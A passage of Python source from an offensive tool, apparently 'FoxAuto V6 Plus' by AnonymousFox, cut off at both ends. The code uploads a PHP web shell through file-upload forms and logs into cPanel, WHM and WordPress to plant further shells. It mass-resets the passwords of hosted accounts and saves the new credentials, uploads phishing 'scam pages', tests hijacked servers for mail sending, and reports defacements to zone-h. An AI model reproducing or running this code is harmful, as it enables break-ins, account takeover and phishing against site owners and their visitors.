elif ('name="upload[]"' in src or "name='upload[]'" in src or 'name= "upload[]"' in src or 'name= \'upload[]\'' in src or 'name = "upload[]"' in src or 'name = \'upload[]\'' in src or 'name ="upload[]"' in src or 'name =\'upload[]\'' in src or 'name=upload[]' in src or 'name =upload[]' in src or 'name= upload[]' in src or 'name = upload[]' in src):
fileup = {'upload[]':(filename, shell_Fox)}
elif ('name="uploadfiles"' in src or "name='uploadfiles'" in src or 'name= "uploadfiles"' in src or 'name= \'uploadfiles\'' in src or 'name = "uploadfiles"' in src or 'name = \'uploadfiles\'' in src or 'name ="uploadfiles"' in src or 'name =\'uploadfiles\'' in src or 'name=uploadfiles' in src or 'name =uploadfiles' in src or 'name= uploadfiles' in src or 'name = uploadfiles' in src):
fileup = {'uploadfiles':(filename, shell_Fox)}
elif ('name="uploadfile"' in src or "name='uploadfile'" in src or 'name= "uploadfile"' in src or 'name= \'uploadfile\'' in src or 'name = "uploadfile"' in src or 'name = \'uploadfile\'' in src or 'name ="uploadfile"' in src or 'name =\'uploadfile\'' in src or 'name=uploadfile' in src or 'name =uploadfile' in src or 'name= uploadfile' in src or 'name = uploadfile' in src):
fileup = {'uploadfile':(filename, shell_Fox)}
elif ('name="idx_files"' in src or "name='idx_files'" in src or 'name= "idx_files"' in src or 'name= \'idx_files\'' in src or 'name = "idx_files"' in src or 'name = \'idx_files\'' in src or 'name ="idx_files"' in src or 'name =\'idx_files\'' in src or 'name=idx_files' in src or 'name =idx_files' in src or 'name= idx_files' in src or 'name = idx_files' in src):
fileup = {'idx_files':(filename, shell_Fox)}
elif ('name="idx_file"' in src or "name='idx_file'" in src or 'name= "idx_file"' in src or 'name= \'idx_file\'' in src or 'name = "idx_file"' in src or 'name = \'idx_file\'' in src or 'name ="idx_file"' in src or 'name =\'idx_file\'' in src or 'name=idx_file' in src or 'name =idx_file' in src or 'name= idx_file' in src or 'name = idx_file' in src):
fileup = {'idx_file':(filename, shell_Fox)}
elif ('name="userfiles"' in src or "name='userfiles'" in src or 'name= "userfiles"' in src or 'name= \'userfiles\'' in src or 'name = "userfiles"' in src or 'name = \'userfiles\'' in src or 'name ="userfiles"' in src or 'name =\'userfiles\'' in src or 'name=userfiles' in src or 'name =userfiles' in src or 'name= userfiles' in src or 'name = userfiles' in src):
fileup = {'userfiles':(filename, shell_Fox)}
elif ('name="userfile"' in src or "name='userfile'" in src or 'name= "userfile"' in src or 'name= \'userfile\'' in src or 'name = "userfile"' in src or 'name = \'userfile\'' in src or 'name ="userfile"' in src or 'name =\'userfile\'' in src or 'name=userfile' in src or 'name =userfile' in src or 'name= userfile' in src or 'name = userfile' in src):
fileup = {'userfile':(filename, shell_Fox)}
elif ('name="upfiles"' in src or "name='upfiles'" in src or 'name= "upfiles"' in src or 'name= \'upfiles\'' in src or 'name = "upfiles"' in src or 'name = \'upfiles\'' in src or 'name ="upfiles"' in src or 'name =\'upfiles\'' in src or 'name=upfiles' in src or 'name =upfiles' in src or 'name= upfiles' in src or 'name = upfiles' in src):
fileup = {'upfiles':(filename, shell_Fox)}
elif ('name="inputfiles"' in src or "name='inputfiles'" in src or 'name= "inputfiles"' in src or 'name= \'inputfiles\'' in src or 'name = "inputfiles"' in src or 'name = \'inputfiles\'' in src or 'name ="inputfiles"' in src or 'name =\'inputfiles\'' in src or 'name=inputfiles' in src or 'name =inputfiles' in src or 'name= inputfiles' in src or 'name = inputfiles' in src):
fileup = {'inputfiles':(filename, shell_Fox)}
elif ('name="inputfile"' in src or "name='inputfile'" in src or 'name= "inputfile"' in src or 'name= \'inputfile\'' in src or 'name = "inputfile"' in src or 'name = \'inputfile\'' in src or 'name ="inputfile"' in src or 'name =\'inputfile\'' in src or 'name=inputfile' in src or 'name =inputfile' in src or 'name= inputfile' in src or 'name = inputfile' in src):
fileup = {'inputfile':(filename, shell_Fox)}
elif ('name="filenames"' in src or "name='filenames'" in src or 'name= "filenames"' in src or 'name= \'filenames\'' in src or 'name = "filenames"' in src or 'name = \'filenames\'' in src or 'name ="filenames"' in src or 'name =\'filenames\'' in src or 'name=filenames' in src or 'name =filenames' in src or 'name= filenames' in src or 'name = filenames' in src):
fileup = {'filenames':(filename, shell_Fox)}
elif ('name="filename"' in src or "name='filename'" in src or 'name= "filename"' in src or 'name= \'filename\'' in src or 'name = "filename"' in src or 'name = \'filename\'' in src or 'name ="filename"' in src or 'name =\'filename\'' in src or 'name=filename' in src or 'name =filename' in src or 'name= filename' in src or 'name = filename' in src):
fileup = {'filename':(filename, shell_Fox)}
elif ('name="file_n"' in src or "name='file_n'" in src or 'name= "file_n"' in src or 'name= \'file_n\'' in src or 'name = "file_n"' in src or 'name = \'file_n\'' in src or 'name ="file_n"' in src or 'name =\'file_n\'' in src or 'name=file_n' in src or 'name =file_n' in src or 'name= file_n' in src or 'name = file_n' in src):
fileup = {'file_n':(filename, shell_Fox)}
elif ('name="files"' in src or "name='files'" in src or 'name= "files"' in src or 'name= \'files\'' in src or 'name = "files"' in src or 'name = \'files\'' in src or 'name ="files"' in src or 'name =\'files\'' in src or 'name=files' in src or 'name =files' in src or 'name= files' in src or 'name = files' in src):
fileup = {'files':(filename, shell_Fox)}
elif ('name="file"' in src or "name='file'" in src or 'name= "file"' in src or 'name= \'file\'' in src or 'name = "file"' in src or 'name = \'file\'' in src or 'name ="file"' in src or 'name =\'file\'' in src or 'name=file' in src or 'name =file' in src or 'name= file' in src or 'name = file' in src):
fileup = {'file':(filename, shell_Fox)}
elif ('name="f"' in src or "name='f'" in src or 'name= "f"' in src or 'name= \'f\'' in src or 'name = "f"' in src or 'name = \'f\'' in src or 'name ="f"' in src or 'name =\'f\'' in src or 'name=f' in src or 'name =f' in src or 'name= f' in src or 'name = f' in src):
fileup = {'f':(filename, shell_Fox)}
elif ('name="images"' in src or "name='images'" in src or 'name= "images"' in src or 'name= \'images\'' in src or 'name = "images"' in src or 'name = \'images\'' in src or 'name ="images"' in src or 'name =\'images\'' in src or 'name=images' in src or 'name =images' in src or 'name= images' in src or 'name = images' in src):
fileup = {'images':(filename, shell_Fox)}
elif ('name="image"' in src or "name='image'" in src or 'name= "image"' in src or 'name= \'image\'' in src or 'name = "image"' in src or 'name = \'image\'' in src or 'name ="image"' in src or 'name =\'image\'' in src or 'name=image' in src or 'name =image' in src or 'name= image' in src or 'name = image' in src):
fileup = {'image':(filename, shell_Fox)}
elif ('name="uploader"' in src or "name='uploader'" in src or 'name= "uploader"' in src or 'name= \'uploader\'' in src or 'name = "uploader"' in src or 'name = \'uploader\'' in src or 'name ="uploader"' in src or 'name =\'uploader\'' in src or 'name=uploader' in src or 'name =uploader' in src or 'name= uploader' in src or 'name = uploader' in src):
fileup = {'uploader':(filename, shell_Fox)}
elif ('name="uploads"' in src or "name='uploads'" in src or 'name= "uploads"' in src or 'name= \'uploads\'' in src or 'name = "uploads"' in src or 'name = \'uploads\'' in src or 'name ="uploads"' in src or 'name =\'uploads\'' in src or 'name=uploads' in src or 'name =uploads' in src or 'name= uploads' in src or 'name = uploads' in src):
fileup = {'uploads':(filename, shell_Fox)}
elif ('name="upload"' in src or "name='upload'" in src or 'name= "upload"' in src or 'name= \'upload\'' in src or 'name = "upload"' in src or 'name = \'upload\'' in src or 'name ="upload"' in src or 'name =\'upload\'' in src or 'name=upload' in src or 'name =upload' in src or 'name= upload' in src or 'name = upload' in src):
fileup = {'upload':(filename, shell_Fox)}
else :
fileup = {'up': (filename, shell_Fox)}
up = req.post(url, data=filedata, files=fileup, headers=headers, verify=False, timeout=60)
up_src = content_Fox(up)
if(str(URL_FOX(url)) + '/' + filename in up_src or str(URL_FOX(url)) + '//' + filename in up_src):
shell_path = shellPath_Fox(url, filename, 2)
else:
shell_path = shellPath_Fox(url, filename, 1)
check = requests.get(shell_path, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'token' in checkups) :
return shell_path
elif ('charset' in src and 'uploadFile' in src and 'FilesMAn' in src and 'Windows' in src):
filedata2 = {'a': 'FilesTools', 'p1': filename, 'p2': 'mkfile', 'p3': '{}'.format(shell_Fox), 'ne': '', 'charset': 'Windows-1251', 'c': ''}
up = req.post(url, data=filedata2, headers=headers, verify=False, timeout=60)
check = requests.get(shell_path, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'token' in checkups) :
return shell_path
return False
except :
return False
def zoneH(url, name):
try:
print(' {}[*] Post in Zone-h ..... {}(Waiting)'.format(fw, fr))
post = {'defacer': name, 'domain1': url, 'hackmode': '1', 'reason': '1'}
p = requests.post('http://www.zone-h.org/notify/single', data=post, headers=headers, verify=False, timeout=30)
p = content_Fox(p)
if('"red">OK</font>' in p):
print(' {}[+] Succeed.'.format(fg))
elif('Domain has been defaced during last year' in p):
print(' {}[-] Domain has been defaced during last year.'.format(fr))
elif('banned' in p):
print(' {}[-] your IP is banned.'.format(fr))
else:
print(' {}[-] Failed'.format(fr))
except:
print(' {}[-] Failed'.format(fr))
def uploadFile_ALL(url):
try:
req = requests.session()
check = req.get(url, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
up1 = uploadSemiAuto(url, check, req)
if(up1 is False): pass
else : return up1
up2 = _______________________dosypamcpfti(url, check)
if(up2 is False): pass
else : return up2
print(' {}[-] Failed Upload.'.format(fr))
return False
except:
print(' {}[-] Failed Upload.'.format(fr))
return False
def upload(url):
try:
req = requests.session()
check = req.get(url, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
up1 = uploadSemiAuto(url, check, req)
if(up1 is False): pass
else : return up1
up2 = _______________________dosypamcpfti(url, check)
if(up2 is False): pass
else : return up2
return False
except:
return False
def exploitWHM(backdor, cpanelsRs):
try:
print (' {}[*] Get cPanel from WHM ..... {}(Waiting)'.format(fc, fr))
for rs in cpanelsRs:
username = rs[1]
password = rs[2]
try:
ip = 'https://' + URLdomain_Fox(backdor) + ':2087'
ipHost = socket.gethostbyname(URLdomain_Fox(backdor))
c = WHMchangePasswordP(ip, username, password, ipHost)
if (c is False): print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
else: print (' {} - {}{}{} [{}{} USERS{}]'.format(fr, fw, username, fr, fg, c, fr))
except:
print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
except:
print(' {}[-] Failed.'.format(fr))
def exploitAcesshash(backdor):
try:
print (' {}[*] Get cPanel from WHM ..... {}(Waiting)'.format(fc, fr))
hashs = requests.get('{}?php={}/_@files/php/accesshash.txt'.format(backdor, dom), headers=headers, timeout=30)
hashs = content_Fox(hashs)
if (re.findall(re.compile('<br><accesshash>(.*):(.*)</accesshash><br>'), hashs)):
hashs = re.findall(re.compile('<br><accesshash>(.*):(.*)</accesshash><br>'), hashs)
for h in hashs:
username = h[0]
try:
accesshash = h[1]
ip = 'https://' + URLdomain_Fox(backdor) + ':2087'
ipHost = socket.gethostbyname(URLdomain_Fox(backdor))
c = WHMchangePasswordA(ip, username, accesshash, ipHost)
if(c is False): print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
else: print (' {} - {}{}{} [{}{} USERS{}]'.format(fr, fw, username, fr, fg, c, fr))
except:
print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
except:
print(' {}[-] Failed.'.format(fr))
def WHMchangePasswordA(ip, username, accesshash, ipHost) :
try:
counter = 0
newpath = r'Results/WHM'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
login = loginWHM_A(ip, username, accesshash)
if (login is False) :
return False
headers = login
if (':2087' in ip):
protocol = 'https://'
port = ':2083'
ipcp = ip.replace('2087', '2083')
elif (':2086' in ip):
protocol = 'http://'
port = ':2082'
ipcp = ip.replace('2086', '2082')
else:
protocol = 'https://'
port = ':2083'
ipcp = ip + ':2083'
getUser = requests.get('{}/json-api/listaccts?viewall=1'.format(ip), headers=headers, verify=False, timeout=30)
getUser = content_Fox(getUser)
try:
listaccts = json.loads(getUser)
usersdata = listaccts['acct']
except:
return counter
for userdata in usersdata:
try :
user = userdata.get('user')
domain = userdata.get('domain')
if (str(username) != str(user)):
newPasswd = "f0x@" + random_Fox(3) + "FoX" + random_Fox(3) + "#x"
postchangeP = {'api.version': '1', 'password': newPasswd, 'user': user}
changePR = requests.post('{}/json-api/passwd'.format(ip), headers=headers, data=postchangeP, verify=False, timeout=30)
if (changePR):
counter = counter + 1
open('Results/WHM/{}-{}.txt'.format(ipHost, username), 'a').write('{}{}{}|{}|{}\n'.format(protocol, domain, port, user, newPasswd))
except :
pass
return counter
except:
return False
def WHMchangePasswordP(ip, username, password, ipHost) :
try :
counter = 0
newpath = r'Results/WHM'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
login = loginWHM(ip, username, password)
if (login is False) :
return False
cookies = login[0]
idcp = login[1]
if (':2087' in ip) :
protocol = 'https://'
port = ':2083'
ipcp = ip.replace('2087', '2083')
elif (':2086' in ip) :
protocol = 'http://'
port = ':2082'
ipcp = ip.replace('2086', '2082')
else :
protocol = 'https://'
port = ':2083'
ipcp = ip+':2083'
getUser = cookies.get('{}/{}/scripts4/listaccts?viewall=1'.format(ip, idcp), verify=False, timeout=30)
getUser = content_Fox(getUser)
users = []
if (re.findall(re.compile('user="(.*)" domain="(.*)" suspended="0"'), getUser)):
users = re.findall(re.compile('user="(.*)" domain="(.*)" suspended="0"'), getUser)
else:
return counter
for user in users:
try :
if (str(username) != str(user[0])) :
newPasswd = "f0x@" + random_Fox(3) + "FoX" + random_Fox(3) + "#x"
getToken = cookies.get('{}/{}/scripts4/listaccts?viewall=1'.format(ip, idcp), verify=False, timeout=30)
getToken = content_Fox(getToken)
token = re.findall(re.compile('name=passwordtoken value=\'(.*)\''),getToken)[0]
domain = re.findall(re.compile('user="{}" domain="(.*)" suspended="0"'.format(user[0])), getToken)[0]
postchangeP = {'password': newPasswd, 'user': user[0], 'passwordtoken': token, 'enablemysql': '1'}
changePR = cookies.post('{}/{}/scripts/passwd'.format(ip, idcp), data=postchangeP, verify=False, timeout=30)
if (changePR) :
counter = counter + 1
open('Results/WHM/{}-{}.txt'.format(ipHost, username), 'a').write('{}{}{}|{}|{}\n'.format(protocol,domain,port,user[0],newPasswd))
except :
pass
return counter
except :
return False
def loginWHM_A(ip, username, accesshash) :
try :
if ('\n' in accesshash) :
accesshash = accesshash.replace('\n', '')
headers = {'Authorization': 'WHM {}:{}'.format(username, accesshash)}
login = requests.get('{}/json-api/'.format(ip), headers=headers, verify=False, timeout=15)
login = content_Fox(login)
if ('Unknown App Requested' in login):
return headers
else :
return False
except:
return False
def loginWHM(ip, username, password):
try :
req = requests.session()
postlogin = {'user': username, 'pass': password, 'login_submit': 'Log in', 'goto_uri': '/'}
login = req.post(ip + '/login/', data=postlogin, verify=False, timeout=15)
login = content_Fox(login)
if ('Account_Functions' in login or 'src="/cpsess' in login) :
if (re.findall(re.compile('window.COMMON.securityToken = "(.*)/(.*)";'), login)):
idcp = re.findall(re.compile('window.COMMON.securityToken = "(.*)/(.*)";'), login)[0][1]
elif (re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), login)):
idcp = re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), login)[0][1]
elif (re.findall(re.compile('href="/cpsess(.*)/'), login)):
idcp = 'cpsess' + re.findall(re.compile('href="/cpsess(.*)/"'), login)[0]
elif (re.findall(re.compile('src="/cpsess(.*)/scripts/'), login)):
idcp = 'cpsess' + re.findall(re.compile('src="/cpsess(.*)/scripts/'), login)[0]
else:
req = requests.session()
login = req.post(ip + '/login/?login_only=1', data=postlogin, verify=False, timeout=15)
login = content_Fox(login)
loginJson = json.loads(login)
idcp = loginJson["security_token"][1:]
return req, idcp
else :
return False
except:
return False
def loginCPanel_Fox(ip, username, password):
try :
reqFox = requests.session()
postlogin_Fox = {'user':username, 'pass':password, 'login_submit':'Log in', 'act':'AnonymousFox'}
loginCP_Fox = reqFox.post(ip + '/login/', verify=False, data=postlogin_Fox, headers=headers, timeout=15)
loginCP_Fox = content_Fox(loginCP_Fox)
if (('filemanager' in loginCP_Fox or '/home' in loginCP_Fox) and ('error_reporting' in checkups)) :
if (re.findall(re.compile('PAGE.securityToken = "(.*)/(.*)";'), loginCP_Fox)):
idcp_Fox = re.findall(re.compile('PAGE.securityToken = "(.*)/(.*)";'), loginCP_Fox)[0][1]
elif (re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), loginCP_Fox)):
idcp_Fox = re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), loginCP_Fox)[0][1]
elif (re.findall(re.compile('href="/cpsess(.*)/3rdparty'),loginCP_Fox)):
idcp_Fox = 'cpsess'+re.findall(re.compile('href="/cpsess(.*)/3rdparty'), loginCP_Fox)[0]
elif (re.findall(re.compile('href="/cpsess(.*)/frontend/'), loginCP_Fox)) :
idcp_Fox = 'cpsess' + re.findall(re.compile('href="/cpsess(.*)/frontend/'), loginCP_Fox)[0]
if (re.findall(re.compile('PAGE.domain = "(.*)";'),loginCP_Fox)):
domain_Fox = re.findall(re.compile('PAGE.domain = "(.*)";'),loginCP_Fox)[0]
elif (re.findall(re.compile('<a id="lnkMaintain_DomainName" href="security/tls_status/#/?domain=(.*)">'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<a id="lnkMaintain_DomainName" href="security/tls_status/#/?domain=(.*)">'), loginCP_Fox)[0]
elif (re.findall(re.compile('<tr id="domainNameRow" ng-controller="sslStatusController" ng-init="primaryDomain = \'(.*)\'; "'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<tr id="domainNameRow" ng-controller="sslStatusController" ng-init="primaryDomain = \'(.*)\'; "'), loginCP_Fox)[0]
elif (re.findall(re.compile('<span id="txtDomainName" class="general-info-value">(.*)</span>'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<span id="txtDomainName" class="general-info-value">(.*)</span>'), loginCP_Fox)[0]
elif (re.findall(re.compile('<b>(.*)</b>'), loginCP_Fox)):
domain_Fox = re.findall(re.compile('<b>(.*)</b>'), loginCP_Fox)[0]
if (re.findall(re.compile('/home(.*)' + username), loginCP_Fox)):
home = '/home' + re.findall(re.compile('/home(.*)' + username), loginCP_Fox)[0]
else :
home = '/home/'
if ('strlen' in checkups):
return reqFox, idcp_Fox, domain_Fox, home
else :
return False
except :
return False
def uploadFileByCPanel_Fox(ip, username, cookies, idcp, domain, home):
try :
filename = random_Fox(10) + '.php'
filedata_Fox = {'dir': home + username + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
fileup_Fox = {'file-0': (filename, shell_Fox)}
try:
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=120)
except:
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), verify=False, data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=150)
time.sleep(3)
try:
shell_path = 'https://' + domain + '/' + filename
check = requests.get(shell_path, headers=headers, timeout=15)
check = content_Fox(check)
except:
shell_path = 'http://' + domain + '/' + filename
check = requests.get(shell_path, headers=headers, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'substr' in checkups):
return shell_path
else :
return False
except :
return False
def cPanel(datacPanel, up=0):
try :
if (re.findall(re.compile('(.*)\|(.*)\|(.*)'), datacPanel)):
cp = re.findall(re.compile('(.*)\|(.*)\|(.*)'), datacPanel)
ip = cp[0][0]
username = cp[0][1]
password = cp[0][2]
print(" [*] cPanel : {}".format(ip))
print(" [*] Username : {}".format(username))
print(" [*] Password : {}".format(password))
login_Fox = loginCPanel_Fox(ip, username, password)
if (login_Fox is False) :
print(' {}[-] Login failed'.format(fr))
return False
open('Results/Login_Successful_cPanels.txt', 'a').write('{}\n'.format(datacPanel))
print(' {}[+] Login successful.'.format(fg))
if (int(up) == 1) :
shell_path = uploadFileByCPanel_Fox(ip, username, login_Fox[0], login_Fox[1], login_Fox[2], login_Fox[3])
if (shell_path is False) :
print(" {}[-] Failed upload.".format(fr))
return False
else :
return shell_path
else :
return login_Fox[0], login_Fox[1], login_Fox[2], login_Fox[3]
else :
print(' {}[-] The list must be https://domain.com:2083|username|password'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def ZIP(backdor, file) :
try :
print(' {}[*] Upload File ZIP..... {}(Waiting)'.format(fw, fr))
filedata = {'uploadZIP': 'uploadZIP'}
fileup = {'file': (file, open(file,'rb'), 'multipart/form-data')}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=60)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=90)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
print(' {}[+] Succeeded UPload.'.format(fg))
folder = re.findall(re.compile('<folder>(.*)</folder>'), upFile)[0]
ZIPdata = {'zips': file, 'folderZIP' : folder, 'unzip': 'AnonymousFox'}
file_path_ZIP = shellPath_Fox(backdor, folder, 1) + '/'
try :
ZIP = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=ZIPdata, headers=headers, timeout=15)
except:
ZIP = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=ZIPdata, headers=headers, timeout=30)
if (ZIP.status_code != 403) :
print(' {}[+] Succeeded UNZIP.\n - {}{}'.format(fg, fr, file_path_ZIP))
open('Results/Scam_Pages.txt', 'a').write('{}\n'.format(file_path_ZIP))
print(' {}[+] Saved in {}Results/Scam_Pages.txt'.format(fg, fr))
else :
print(' {}[-] Failed UNZIP.'.format(fr))
else:
print(' {}[-] Failed UPload.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def checkSend(backdor, shell) :
try :
print(' {}[*] Check Sending mail ..... {}(Waiting)'.format(fw, fr))
src = str(changemail_Fox())
email = re.findall(re.compile('\'(.*)\', <RequestsCookieJar'), src)[0]
cookies = re.findall(re.compile('name=\'PHPSESSID\', value=\'(.*)\', port='), src)[0]
post = {'email': email, 'mailCheck': 'AnonymousFox'}
try :
sendCode = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
sendCode = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
sendCode = content_Fox(sendCode)
if ('<codemail>' in sendCode) :
code = re.findall(re.compile('<codemail>(.*)</codemail>'), sendCode)[0]
time.sleep(5)
check = checkinboxTestPHP(cookies, email, code)
start = timer()
while ((check == 'bad') and ((timer() - start) <= 30)):
time.sleep(10)
check = checkinboxTestPHP(cookies, email, code)
if (check == 'bad') :
print(' {}[-] Sending mail is Not Working.'.format(fr))
open('Results/SendingMail_NotWork.txt', 'a').write('{}\n'.format(shell))
else :
print(' {}[+] Sending mail is Working Well.'.format(fg))
open('Results/SendingMail_Work.txt', 'a').write('{}\n'.format(shell))
else :
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def about():
try :
try :
update = requests.get('https://anonymousfox.is/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
except:
update = requests.get('https://anonymousfox.io/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
update = content_Fox(update)
if ('FoxAuto' not in update) :
update = requests.get('https://anonymousfox.io/_@info/FoxAuto_update.txt', headers=headers, timeout=15)
update = content_Fox(update)
print("""
{}FoxAuto Version {}6 Plus{}\n
Programmed{} by {}AnonymousFox{}\n
{}Telegram:{} @Anonymous_Fox\n
Our sites: anonymousfox.com || .net || .info \n
Thanks to friends: X7 ROOT, Olux, Dr.SiLnT HilL, RxR, Ali Shahien,
Alarg53, Golden-security, chinafans, Bala sniper, aDriv4\n
Last updated: {}{} \n""".format(fw, fg, fr, fw, fg, fw, fc, fw, fg, update))
except:
pass
def main():
try :
log()
try :
main = requests.get('https://anonymousfox.is/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
except:
main = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
if (main.status_code != 200) :
main = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_news.txt', headers=headers, timeout=15)
m = content_Fox(main)
news = re.findall(re.compile('(.*)]:(.*)'),m)[0]
print('\n {}{}]{}:{}{}\n'.format(fr, news[0], fw, fg, news[1]))
time.sleep(1)
except:
pass
def Request():
try :
print(" If you are looking for new features or tools ..")
time.sleep(3)
print(" Most likely what you want is already in this program")
time.sleep(3)
print(" But you do not know all the features of this program")
time.sleep(3)
print(" Watch these videos carefully\n")
try :
vv = requests.get('https://anonymousfox.is/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
except:
vv = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
if (vv.status_code != 200) :
vv = requests.get('https://anonymousfox.io/_@info/FoxAutoV6Plus_videos.txt', headers=headers, timeout=15)
v = content_Fox(vv)
if (re.findall(re.compile('<vi1>video: (.*)</vi1>'), v)):
video = re.findall(re.compile('<vi1>video: (.*)</vi1>'), v)[0]
print(" {}[PART 1] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi2>video: (.*)</vi2>'), v)):
video = re.findall(re.compile('<vi2>video: (.*)</vi2>'), v)[0]
print(" {}[PART 2] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi3>video: (.*)</vi3>'), v)):
video = re.findall(re.compile('<vi3>video: (.*)</vi3>'), v)[0]
print(" {}[PART 3] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi4>video: (.*)</vi4>'), v)):
video = re.findall(re.compile('<vi4>video: (.*)</vi4>'), v)[0]
print(" {}[PART 4] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi5>video: (.*)</vi5>'), v)):
video = re.findall(re.compile('<vi5>video: (.*)</vi5>'), v)[0]
print(" {}[PART 5] {}=>{} {}".format(fg, fw, fr, video))
if (re.findall(re.compile('<vi6>video: (.*)</vi6>'), v)):
video = re.findall(re.compile('<vi6>video: (.*)</vi6>'), v)[0]
print(" {}[PART 6] {}=>{} {}".format(fg, fw, fr, video))
time.sleep(2)
print("\n For more tools, Follow us Telegram: {}@Anonymous_Fox".format(fc))
time.sleep(2)
print(" For Request specific tools, Contact us Telegram: {}@Anonymous_F0x\n".format(fc))
time.sleep(2)
except :
pass
def loginWP_UP_Fox(url, username, password) :
try :
while (url[-1] == "/"):
pattern_Fox = re.compile('(.*)/')
sitez = re.findall(pattern_Fox, url)
url = sitez[0]
print(' {}[D] {} {}[WordPress]'.format(fw, url, fg))
print(' {}[U] {}'.format(fw, username))
print(' {}[P] {}'.format(fw, password))
reqFox = requests.session()
headersLogin = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': url+'/wp-admin/'}
loginPost_Fox = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': url + '/wp-admin/' ,'testcookie': '1', 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/wp-login.php', verify=False, data=loginPost_Fox, headers=headersLogin, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('profile/login' in login_Fox) :
id = re.findall(re.compile('type="hidden" name="force_redirect_uri-(.*)" id='), login_Fox)[0]
myuserpro = re.findall(re.compile('name="_myuserpro_nonce" value="(.*)" /><input type="hidden" name="_wp_http_referer"'), login_Fox)[0]
loginPost_Fox = {'template': 'login', 'unique_id': '{}'.format(id) , 'up_username': '0', 'user_action': '',
'_myuserpro_nonce': myuserpro, '_wp_http_referer': '/profile/login/', 'action': 'userpro_process_form',
'force_redirect_uri-{}'.format(id) : '0', 'group': 'default', 'redirect_uri-{}'.format(id) : '', 'shortcode': '',
'user_pass-{}'.format(id) : password, 'username_or_email-{}'.format(id): username, 'act':'AnonymousFox'}
login_Fox = reqFox.post(url + '/wp-admin/admin-ajax.php', verify=False, data=loginPost_Fox, headers=headersLogin , timeout=15)
check = reqFox.get(url + '/wp-admin/', verify=False, headers=headers, timeout=15)
check = content_Fox(check)
if ('profile.php' not in check and 'confirm_admin_email' not in check and 'admin-email-confirm-form' not in check and 'upgrade.php' not in check):
if ('http://' in url):
url = url.replace('http://', 'https://')
login_Fox = reqFox.post(url + '/wp-login.php', verify=False, data=loginPost_Fox, headers=headersLogin, timeout=15)
check = reqFox.get(url + '/wp-admin/', verify=False, headers=headers, timeout=10)
check = content_Fox(check)
if (('profile.php' in check or 'confirm_admin_email' in check or 'admin-email-confirm-form' in check or 'upgrade.php' in check) and 'move_uploaded_file' in testSendB) :
if ('upgrade.php' in check) :
upgrade = reqFox.get(url + '/wp-admin/upgrade.php?step=1', verify=False, headers=headers, timeout=15)
print(' {}[+] Succeeded Login.'.format(fg))
newShell = randomPluginWP_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('backdor-panel.txt', 1)
newShell = wp_file_manager_Fox(url, reqFox)
if (newShell == 'AnonymousFox') :
getFile('theme.zip', 2)
newShell = randomThemeWP_Fox(url, reqFox)
if (newShell != 'AnonymousFox' and 'hexdec' in checkups) :
return newShell
else :
print(' {}[-] Failed Upload.'.format(fr))
return False
else :
